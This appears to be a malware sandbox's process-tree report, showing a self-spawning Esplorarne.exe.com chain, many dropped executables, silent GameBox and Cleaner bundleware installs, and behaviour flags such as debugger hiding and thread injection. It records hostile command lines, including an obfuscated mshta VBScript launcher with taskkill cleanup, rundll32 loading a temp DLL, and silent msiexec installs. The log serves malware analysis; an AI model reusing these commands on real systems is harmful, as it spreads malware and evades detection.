C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i26⤵
- Suspicious use of SendNotifyMessage
PID:4256 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i27⤵
- Suspicious use of SendNotifyMessage
PID:5412 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i28⤵
- Suspicious use of SendNotifyMessage
PID:6592 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i29⤵
- Suspicious use of SendNotifyMessage
PID:6352 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i30⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SendNotifyMessage
PID:5676 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i31⤵PID:3168
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i32⤵PID:252
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i33⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:4812 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i34⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:2776 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i35⤵PID:2896
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i36⤵PID:676
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i37⤵PID:6152
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i38⤵PID:3696
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i39⤵PID:5604
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i40⤵PID:1908
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i41⤵PID:4900
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i42⤵PID:6344
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i43⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3724 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i44⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i45⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SendNotifyMessage
PID:1580 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i46⤵PID:248
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i47⤵PID:6260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i48⤵PID:5896
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i49⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i50⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3504 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i51⤵PID:5912
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i52⤵PID:6560
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i53⤵PID:6132
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i54⤵PID:868
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i55⤵PID:7124
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i56⤵PID:4460
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i57⤵PID:6324
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i58⤵PID:5520
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i59⤵PID:2720
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i60⤵PID:6556
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i61⤵PID:3260
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i62⤵PID:7064
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i63⤵
- Suspicious use of SendNotifyMessage
PID:6796 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i64⤵PID:3008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i65⤵PID:6296
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i66⤵PID:4468
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i67⤵PID:1832
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i68⤵PID:5652
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i69⤵PID:6120
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i70⤵PID:4592
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i71⤵PID:2848
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i72⤵PID:1308
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i73⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i74⤵PID:344
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i75⤵PID:3672
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i76⤵PID:6692
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i77⤵PID:5312
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i78⤵PID:4628
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i79⤵PID:3988
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i80⤵PID:2520
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i81⤵PID:2928
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i82⤵PID:5440
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i83⤵
- Suspicious use of AdjustPrivilegeToken
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i84⤵PID:6064
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i85⤵PID:4176
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i86⤵PID:3928
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i87⤵PID:3944
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i88⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:2120 -
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i89⤵PID:1652
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i90⤵PID:1392
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i91⤵PID:4060
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i92⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i93⤵PID:3608
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i94⤵PID:7008
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i95⤵PID:3024
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i96⤵PID:1704
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i97⤵PID:1684
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i98⤵PID:4712
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i99⤵PID:4380
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i100⤵PID:584
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i101⤵PID:5376
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i102⤵PID:5484
-
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.comC:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i103⤵PID:4136
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
-
C:\Windows\SysWOW64\PING.EXEping YJTUIPJF -n 309⤵
- Runs ping.exe
PID:4620
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵
- Executes dropped EXE
PID:5692 -
C:\Users\Admin\Documents\WSihcGkcqXR6le8EalrmHzWj.exe"C:\Users\Admin\Documents\WSihcGkcqXR6le8EalrmHzWj.exe"6⤵PID:5644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5644 -s 2967⤵
- Executes dropped EXE
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious use of AdjustPrivilegeToken
PID:1232
-
-
-
C:\Users\Admin\Documents\aOyuxdhnzKpdLQqKmstaSWkX.exe"C:\Users\Admin\Documents\aOyuxdhnzKpdLQqKmstaSWkX.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2280
-
-
C:\Users\Admin\Documents\_966MQ36AfEGqxXohPfrnE1X.exe"C:\Users\Admin\Documents\_966MQ36AfEGqxXohPfrnE1X.exe"6⤵PID:1668
-
C:\Users\Admin\Documents\_966MQ36AfEGqxXohPfrnE1X.exeC:\Users\Admin\Documents\_966MQ36AfEGqxXohPfrnE1X.exe7⤵PID:6056
-
-
-
C:\Users\Admin\Documents\kIM16cafxLNLWW4ObJ5lbDz3.exe"C:\Users\Admin\Documents\kIM16cafxLNLWW4ObJ5lbDz3.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6272
-
-
C:\Users\Admin\Documents\OmkgDhSsYmPCdoo1bg6tebQE.exe"C:\Users\Admin\Documents\OmkgDhSsYmPCdoo1bg6tebQE.exe"6⤵PID:6332
-
C:\Users\Admin\Documents\OmkgDhSsYmPCdoo1bg6tebQE.exe"C:\Users\Admin\Documents\OmkgDhSsYmPCdoo1bg6tebQE.exe" -q7⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:2144 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2144 -s 7328⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6388
-
-
-
-
C:\Users\Admin\Documents\n5WhBA6Yak3TTgd7U725hzDM.exe"C:\Users\Admin\Documents\n5WhBA6Yak3TTgd7U725hzDM.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:6248
-
-
C:\Users\Admin\Documents\A1Dm9fcwxkKZ24qs33cx9NiP.exe"C:\Users\Admin\Documents\A1Dm9fcwxkKZ24qs33cx9NiP.exe"6⤵
- Suspicious use of SetThreadContext
PID:6240 -
C:\Users\Admin\Documents\A1Dm9fcwxkKZ24qs33cx9NiP.exeC:\Users\Admin\Documents\A1Dm9fcwxkKZ24qs33cx9NiP.exe7⤵PID:5256
-
-
-
C:\Users\Admin\Documents\8MpcjGHahMc1jHskfk6velZQ.exe"C:\Users\Admin\Documents\8MpcjGHahMc1jHskfk6velZQ.exe"6⤵PID:5312
-
-
C:\Users\Admin\Documents\EyyvES3UJXxI7Z7ZU_LACgCv.exe"C:\Users\Admin\Documents\EyyvES3UJXxI7Z7ZU_LACgCv.exe"6⤵PID:6048
-
-
C:\Users\Admin\Documents\oCJShWpEDg2vb_36xQrpk0jX.exe"C:\Users\Admin\Documents\oCJShWpEDg2vb_36xQrpk0jX.exe"6⤵PID:2860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 3207⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6268
-
-
-
C:\Users\Admin\Documents\YnHSGQX1ttQX4esXpBPFpc6a.exe"C:\Users\Admin\Documents\YnHSGQX1ttQX4esXpBPFpc6a.exe"6⤵
- Drops file in Program Files directory
PID:4644
-
-
C:\Users\Admin\Documents\SgTv00BLzS9bqtQfmDyElJLY.exe"C:\Users\Admin\Documents\SgTv00BLzS9bqtQfmDyElJLY.exe"6⤵PID:1352
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1352 -s 2767⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1320
-
-
-
C:\Users\Admin\Documents\VvDA4wT5C4ERNtP7UJF8IE6V.exe"C:\Users\Admin\Documents\VvDA4wT5C4ERNtP7UJF8IE6V.exe"6⤵PID:5320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5320 -s 2967⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:1816
-
-
-
C:\Users\Admin\Documents\4SCaAqA1TLosYj6QTTRIiBaI.exe"C:\Users\Admin\Documents\4SCaAqA1TLosYj6QTTRIiBaI.exe"6⤵
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:5136
-
-
C:\Users\Admin\Documents\purlMAaYQeQTs03DWB9pFjHY.exe"C:\Users\Admin\Documents\purlMAaYQeQTs03DWB9pFjHY.exe"6⤵
- Suspicious use of SetThreadContext
PID:4332 -
C:\Users\Admin\Documents\purlMAaYQeQTs03DWB9pFjHY.exe"C:\Users\Admin\Documents\purlMAaYQeQTs03DWB9pFjHY.exe"7⤵
- Suspicious behavior: MapViewOfSection
PID:6492
-
-
-
C:\Users\Admin\Documents\NB4GDI_rhRSOcaAMQtLKFu1b.exe"C:\Users\Admin\Documents\NB4GDI_rhRSOcaAMQtLKFu1b.exe"6⤵PID:6132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6132 -s 2807⤵
- Program crash
PID:4812
-
-
-
C:\Users\Admin\Documents\FZ27jAkcF4aAoKG_r_fAKfqe.exe"C:\Users\Admin\Documents\FZ27jAkcF4aAoKG_r_fAKfqe.exe"6⤵PID:1244
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" VbScRiPt: CLoSe( crEAteOBJeCt ( "wscrIPt.SHelL" ). RUN("C:\Windows\system32\cmd.exe /c cOPY /y ""C:\Users\Admin\Documents\FZ27jAkcF4aAoKG_r_fAKfqe.exe"" hBS_VbW.EXE && StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF """" == """" for %A In (""C:\Users\Admin\Documents\FZ27jAkcF4aAoKG_r_fAKfqe.exe"" ) do taskkill -f -iM ""%~NxA"" ",0 , TRUE) )7⤵PID:6836
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cOPY /y "C:\Users\Admin\Documents\FZ27jAkcF4aAoKG_r_fAKfqe.exe" hBS_VbW.EXE&&StArT hbS_VbW.EXe -p3auHHA5Pn7qj14hc1xRG9TH8FS & IF "" =="" for %A In ("C:\Users\Admin\Documents\FZ27jAkcF4aAoKG_r_fAKfqe.exe" ) do taskkill -f -iM "%~NxA"8⤵PID:6236
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "FZ27jAkcF4aAoKG_r_fAKfqe.exe"9⤵
- Kills process with taskkill
PID:6828
-
-
-
-
-
C:\Users\Admin\Documents\bugwZsWUnZTWujkXnAliYQTV.exe"C:\Users\Admin\Documents\bugwZsWUnZTWujkXnAliYQTV.exe"6⤵PID:5860
-
C:\Users\Admin\AppData\Roaming\5857875.exe"C:\Users\Admin\AppData\Roaming\5857875.exe"7⤵PID:6640
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 6640 -s 23688⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2672
-
-
-
C:\Users\Admin\AppData\Roaming\3364145.exe"C:\Users\Admin\AppData\Roaming\3364145.exe"7⤵PID:2872
-
-
C:\Users\Admin\AppData\Roaming\1766672.exe"C:\Users\Admin\AppData\Roaming\1766672.exe"7⤵
- Suspicious behavior: SetClipboardViewer
PID:6412
-
-
C:\Users\Admin\AppData\Roaming\1191972.exe"C:\Users\Admin\AppData\Roaming\1191972.exe"7⤵PID:6044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6044 -s 22048⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:6320
-
-
-
-
C:\Users\Admin\Documents\AyLBazulHw3BnBjZuQsjywmJ.exe"C:\Users\Admin\Documents\AyLBazulHw3BnBjZuQsjywmJ.exe"6⤵PID:6668
-
C:\Users\Admin\AppData\Local\Temp\is-0TFUG.tmp\AyLBazulHw3BnBjZuQsjywmJ.tmp"C:\Users\Admin\AppData\Local\Temp\is-0TFUG.tmp\AyLBazulHw3BnBjZuQsjywmJ.tmp" /SL5="$2049E,138429,56832,C:\Users\Admin\Documents\AyLBazulHw3BnBjZuQsjywmJ.exe"7⤵PID:5116
-
C:\Users\Admin\AppData\Local\Temp\is-KTOK1.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-KTOK1.tmp\Setup.exe" /Verysilent8⤵
- Drops file in Program Files directory
PID:5416 -
C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe"C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" /qn CAMPAIGN="710"9⤵PID:816
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=710 AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\GameBoxWin64.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316236 /qn CAMPAIGN=""710"" " CAMPAIGN="710"10⤵PID:3492
-
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"C:\Program Files (x86)\GameBox INC\GameBox\md7_7dfj.exe"5⤵
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in Program Files directory
PID:4880
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵
- Executes dropped EXE
- Loads dropped DLL
- Enumerates connected drives
- Suspicious use of FindShellTrayWindow
PID:1460 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629316236 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:412
-
-
-
-
-
-
C:\Windows\System32\sihclient.exeC:\Windows\System32\sihclient.exe /cv pyqXuQaoTk+aSktugxOIig.0.21⤵PID:4580
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k netsvcs -p -s BITS1⤵
- Modifies data under HKEY_USERS
PID:4484
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 4804 -ip 48041⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3376
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:1556
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 2012 -ip 20121⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1520 -ip 15201⤵PID:960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 3696 -ip 36961⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:3472
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}1⤵PID:4052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 4472 -ip 44721⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
PID:4216
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 596 -p 1624 -ip 16241⤵PID:1500
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 1832 -ip 18321⤵PID:5648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 4201⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:2916
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 5728 -ip 57281⤵PID:5940
-
C:\Windows\SysWOW64\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵PID:5728
-
C:\Windows\system32\rundll32.exerundll32.exe "C:\Users\Admin\AppData\Local\Temp\sqlite.dll",global1⤵
